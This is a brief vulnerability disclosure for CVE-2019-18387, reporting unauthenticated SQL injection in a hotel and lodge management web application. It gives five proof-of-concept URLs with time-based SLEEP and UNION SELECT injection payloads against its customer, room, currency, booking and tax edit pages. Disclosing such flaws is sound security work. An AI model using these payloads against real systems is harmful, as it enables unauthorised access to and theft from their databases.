Disclosure date: 10/23/19

CVE-2019-18387

Hotel and Lodge Management System is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the Customer, Room, Currency, Room Booking Details, and Tax Details, functions.

Proof of Concept:

http://192.168.86.24/edit_customer.php?id=4' AND SLEEP(5)-- KAsX
http://192.168.86.24/edit_room.php?id=11' AND SLEEP(5)-- vAKj
http://192.168.86.24/edit_curr.php?id=3' UNION ALL SELECT 9678,CONCAT(0x716a766b71,0x415a5770735a5043434749544b436b4a76686e7665576a446d72437a594969414c4349517655476b,0x7162767871),9678-- EVUO
http://192.168.86.24/edit_booking.php?id=12' AND SLEEP(5)-- hHTj
http://192.168.86.24/edit_tax.php?id=1' AND SLEEP(5)-- RLDn